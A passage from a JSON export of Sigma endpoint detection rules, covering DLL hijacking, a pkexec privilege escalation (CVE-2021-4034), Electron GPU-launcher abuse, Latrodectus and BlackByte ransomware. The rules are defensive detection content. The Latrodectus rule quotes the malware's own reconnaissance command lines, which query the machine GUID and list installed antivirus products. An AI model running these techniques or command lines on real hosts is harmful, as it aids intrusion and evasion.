"rule_id": "4d498a18-ea66-4e96-8224-9ee8bdc07f47",
"rule_name": "Suspicious Control Panel DLL Loaded",
"rule_description": "Detects the loading of a suspicious DLL by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\nControl.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\nIt is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\n",
"rule_creation_date": "2025-05-13",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d52ab05-80d6-4522-b240-24cad32c4a0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088445Z",
"creation_date": "2026-03-23T11:45:34.088447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088451Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034",
"https://access.redhat.com/security/cve/CVE-2021-4034",
"https://ubuntu.com/security/CVE-2021-4034",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034",
"https://github.com/berdav/CVE-2021-4034",
"https://attack.mitre.org/techniques/T1548/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "cve_2021_4034_polkit_pkexec.yml",
"content": "title: Polkit's pkexec CVE-2021-4034 Vulnerability Exploited\nid: 4d52ab05-80d6-4522-b240-24cad32c4a0b\ndescription: |\n Detects a possible exploitation of CVE-2021-4034 in Polkit's pkexec.\n CVE-2021-4034 is a vulnerability within the pkexec binary and can be used by an unprivileged user to obtain root access.\n All major Linux distributions were affected and a proof-of-concept is available publicly.\n It is recommended to investigate the child and parent processes for malicious actions.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034\n - https://access.redhat.com/security/cve/CVE-2021-4034\n - https://ubuntu.com/security/CVE-2021-4034\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034\n - https://github.com/berdav/CVE-2021-4034\n - https://attack.mitre.org/techniques/T1548/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/01/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548\n - attack.t1068\n - cve.2021-4034\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2021-4034\n - classification.Linux.Exploit.Pkexec\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/pkexec'\n CommandLine: ''\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d52ab05-80d6-4522-b240-24cad32c4a0b",
"rule_name": "Polkit's pkexec CVE-2021-4034 Vulnerability Exploited",
"rule_description": "Detects a possible exploitation of CVE-2021-4034 in Polkit's pkexec.\nCVE-2021-4034 is a vulnerability within the pkexec binary and can be used by an unprivileged user to obtain root access.\nAll major Linux distributions were affected and a proof-of-concept is available publicly.\nIt is recommended to investigate the child and parent processes for malicious actions.\n",
"rule_creation_date": "2022-01-27",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d587e21-5699-48e7-8445-551ccb0a9d8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070710Z",
"creation_date": "2026-03-23T11:45:34.070714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070721Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications",
"https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_control_panel_library_load.yml",
"content": "title: Library Loaded from a Folder Masquerading as a Control Panel Item\nid: 4d587e21-5699-48e7-8445-551ccb0a9d8b\ndescription: |\n Detects a process loading a DLL from a folder whose name contains a well-known Control Panel GUID.\n Adversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\n It is recommended to check for malicious activity performed by the process loading the DLL or its parent processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications\n - https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/10/23\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|contains:\n - '.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}\\'\n - '.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\'\n - '.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\\'\n - '.{087DA31B-0DD3-4537-8E23-64A18591F88B}\\'\n - '.{0D2A3442-5181-4E3A-9BD4-83BD10AF3D76}\\'\n - '.{0DF44EAA-FF21-4412-828E-260A8728E7F1}\\'\n - '.{1206F5F1-0569-412C-8FEC-3204630DFB70}\\'\n - '.{17cd9488-1228-4b2f-88ce-4298e93e0966}\\'\n - '.{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n - '.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\\'\n - '.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}\\'\n - '.{37efd44d-ef8d-41b1-940d-96973a50e9e0}\\'\n - '.{3e7efb4c-faf1-453d-89eb-56026875ef90}\\'\n - '.{4026492F-2F69-46B8-B9BF-5654FC07E423}\\'\n - '.{40419485-C444-4567-851A-2DD7BFA1684D}\\'\n - '.{5224F545-A443-4859-BA23-7B5A95BDC8EF}\\'\n - '.{58E3C745-D971-4081-9034-86E34B30836A}\\'\n - '.{5ea4f148-308c-46d7-98a9-49041b1dd468}\\'\n - 
'.{60632754-c523-4b62-b45c-4172da012619}\\'\n - '.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\\'\n - '.{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\\'\n - '.{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\\'\n - '.{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\\'\n - '.{725BE8F7-668E-4C7B-8F90-46BDB0936430}\\'\n - '.{74246bfc-4c96-11d0-abef-0020af6b0b7a}\\'\n - '.{78CB147A-98EA-4AA6-B0DF-C8681F69341C}\\'\n - '.{78F3955E-3B90-4184-BD14-5397C15F1EFC}\\'\n - '.{7A979262-40CE-46ff-AEEE-7884AC3B6136}\\'\n - '.{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\\'\n - '.{80F3F1D5-FECA-45F3-BC32-752C152E456E}\\'\n - '.{87D66A43-7B11-4A28-9811-C86EE395ACF7}\\'\n - '.{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\\'\n - '.{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\\'\n - '.{93412589-74D4-4E4E-AD0E-E0CB621440FD}\\'\n - '.{96AE8D84-A250-4520-95A5-A47A7E3C548B}\\'\n - '.{9C60DE1E-E5FC-40f4-A487-460851A8D915}\\'\n - '.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\\'\n - '.{9FE63AFD-59CF-4419-9775-ABCC3849F861}\\'\n - '.{A0275511-0E86-4ECA-97C2-ECD8F1221D08}\\'\n - '.{A304259D-52B8-4526-8B1A-A1D6CECC8243}\\'\n - '.{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\\'\n - '.{A8A91A66-3A7D-4424-8D24-04E180695C7A}\\'\n - '.{AB3BE6AA-7561-4838-AB77-ACF8427DF426}\\'\n - '.{B2C761C6-29BC-4f19-9251-E6195265BAF1}\\'\n - '.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\\'\n - '.{BAA884F4-3432-48b8-AA72-9BF20EEF31D5}\\'\n - '.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\\'\n - '.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\\'\n - '.{BE122A0E-4503-11DA-8BDE-F66BAD1E3F3A}\\'\n - '.{BF782CC9-5A52-4A17-806C-2A894FFEEAC5}\\'\n - '.{C555438B-3C23-4769-A71F-B6D3D9B6053A}\\'\n - '.{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\\'\n - '.{CB1B7F8C-C50A-4176-B604-9E24DEE8D4D1}\\'\n - '.{D20EA4E1-3957-11d2-A40B-0C5020524153}\\'\n - '.{D450A8A1-9568-45C7-9C0E-B4F9FB4537BD}\\'\n - '.{D555645E-D4F8-4c29-A827-D93C859C4F2A}\\'\n - '.{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}\\'\n - '.{D9EF8727-CAC2-4e60-809E-86F80A666C91}\\'\n - '.{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\\'\n - 
'.{E95A4861-D57A-4be1-AD0F-35267E261739}\\'\n - '.{E9950154-C418-419e-A90A-20C5287AE24B}\\'\n - '.{ECDB0924-4208-451E-8EE0-373C0956DE16}\\'\n - '.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\\'\n - '.{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\\'\n - '.{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\\'\n - '.{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\\'\n - '.{F942C606-0914-47AB-BE56-1321B8035096}\\'\n - '.{FCFEECAE-EE1B-4849-AE50-685DCF7717EC}\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d587e21-5699-48e7-8445-551ccb0a9d8b",
"rule_name": "Library Loaded from a Folder Masquerading as a Control Panel Item",
"rule_description": "Detects a process loading a DLL from a folder whose name contains a well-known Control Panel GUID.\nAdversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\nIt is recommended to check for malicious activity performed by the process loading the DLL or its parent processes.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d721693-c6fd-4568-9bbf-4f9070fd8abe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072640Z",
"creation_date": "2026-03-23T11:45:34.072643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072647Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://positive.security/blog/ms-officecmd-rce",
"https://attack.mitre.org/techniques/t1574"
],
"name": "t1574_electron_gpu_launcher.yml",
"content": "title: Electron Application Started with Insecure GPU Settings\nid: 4d721693-c6fd-4568-9bbf-4f9070fd8abe\ndescription: |\n Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure GPU settings.\n Attackers can use these settings to achieve persistence or perform command injection.\n It is recommended to investigate the parent processes and the execution context, as well as potential malicious actions around this detection, to determine if this action was legitimate.\nreferences:\n - https://positive.security/blog/ms-officecmd-rce\n - https://attack.mitre.org/techniques/t1574\ndate: 2021/12/17\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_app_skype:\n - Image|endswith: '\\skype.exe'\n - OriginalFileName: 'Skype.exe'\n\n selection_app_teams:\n - Image|endswith: '\\Teams.exe'\n - OriginalFileName: 'Teams.exe'\n\n selection_args:\n CommandLine|contains|all:\n - '--disable-gpu-sandbox'\n - '--gpu-launcher'\n\n condition: 1 of selection_app_* and selection_args\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d721693-c6fd-4568-9bbf-4f9070fd8abe",
"rule_name": "Electron Application Started with Insecure GPU Settings",
"rule_description": "Detects the execution of an Electron-based application (Teams, Skype, etc.) using insecure GPU settings.\nAttackers can use these settings to achieve persistence or perform command injection.\nIt is recommended to investigate the parent processes and the execution context, as well as potential malicious actions around this detection, to determine if this action was legitimate.\n",
"rule_creation_date": "2021-12-17",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d7c9617-c2ec-4fad-be66-0d0804d9e122",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097610Z",
"creation_date": "2026-03-23T11:45:34.097612Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097617Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_scncfg.yml",
"content": "title: DLL Hijacking via ScnCfg.exe\nid: 4d7c9617-c2ec-4fad-be66-0d0804d9e122\ndescription: |\n Detects potential Windows DLL Hijacking via ScnCfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate ScnCfg executable alongside a malicious vsodscpl.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n - https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessSignature: 'McAfee, Inc.'\n # ScnCfg.exe has no OriginalFileName\n ProcessDescription: 'VirusScan On-Demand Scan Task Properties'\n ImageLoaded|endswith: '\\vsodscpl.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d7c9617-c2ec-4fad-be66-0d0804d9e122",
"rule_name": "DLL Hijacking via ScnCfg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ScnCfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate ScnCfg executable alongside a malicious vsodscpl.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d7e9eda-970d-4484-95fa-0f433f3355ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099014Z",
"creation_date": "2026-03-23T11:45:34.099016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchfilterhost.yml",
"content": "title: DLL Hijacking via searchfilterhost.exe\nid: 4d7e9eda-970d-4484-95fa-0f433f3355ff\ndescription: |\n Detects potential Windows DLL Hijacking via searchfilterhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'searchfilterhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TQUERY.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d7e9eda-970d-4484-95fa-0f433f3355ff",
"rule_name": "DLL Hijacking via searchfilterhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via searchfilterhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4d861c32-4613-46cf-a560-20bad3598910",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592569Z",
"creation_date": "2026-03-23T11:45:34.592572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592580Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitsight.com/blog/latrodectus-are-you-coming-back",
"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_latrodectus_malware_activity.yml",
"content": "title: Latrodectus Malware Activity Detected\nid: 4d861c32-4613-46cf-a560-20bad3598910\ndescription: |\n Detects command-lines related to Latrodectus activity which are used to get detailed information about the hardware of the host.\n Latrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\n It is recommended to investigate the parent process as well as the context around this alert to look for malicious actions.\nreferences:\n - https://www.bitsight.com/blog/latrodectus-are-you-coming-back\n - https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\n - https://attack.mitre.org/techniques/T1082/\ndate: 2025/07/10\nmodified: 2025/08/05\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Latrodectus\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '/c reg query HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\IDConfigDB\\Hardware Profiles\\0001 /v HwProfileGuid | findstr HwProfileGuid'\n - '/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed'\n - '/c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid | findstr MachineGuid'\n\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4d861c32-4613-46cf-a560-20bad3598910",
"rule_name": "Latrodectus Malware Activity Detected",
"rule_description": "Detects command-lines related to Latrodectus activity which are used to get detailed information about the hardware of the host.\nLatrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\nIt is recommended to investigate the parent process as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4db7476a-88be-4716-891f-51278f296c69",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609507Z",
"creation_date": "2026-03-23T11:45:34.609510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609522Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://www.acronis.com/en-gb/cyber-protection-center/posts/blackbyte-30-uses-vulnerable-drivers-to-compromise-systems/",
"https://attack.mitre.org/techniques/T1486/",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1486_ransomware_blackbyte_executed.yml",
"content": "title: BlackByte Ransomware Executed\nid: 4db7476a-88be-4716-891f-51278f296c69\ndescription: |\n Detects the suspicious execution of svchost.exe with command-line arguments related to the BlackByte Ransomware.\n BlackByte injects its device encryption process into svchost.exe using the process hollowing method.\n BlackByte is also known to have performed BYOVD (vulnerable drivers) techniques in order to disable security products.\n It is recommended to investigate any other alerts indicating malicious activity related to ransomware actors and to dump this process and analyze its contents to determine legitimacy.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://www.acronis.com/en-gb/cyber-protection-center/posts/blackbyte-30-uses-vulnerable-drivers-to-compromise-systems/\n - https://attack.mitre.org/techniques/T1486/\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2024/02/21\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Ransomware.BlackByte\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - 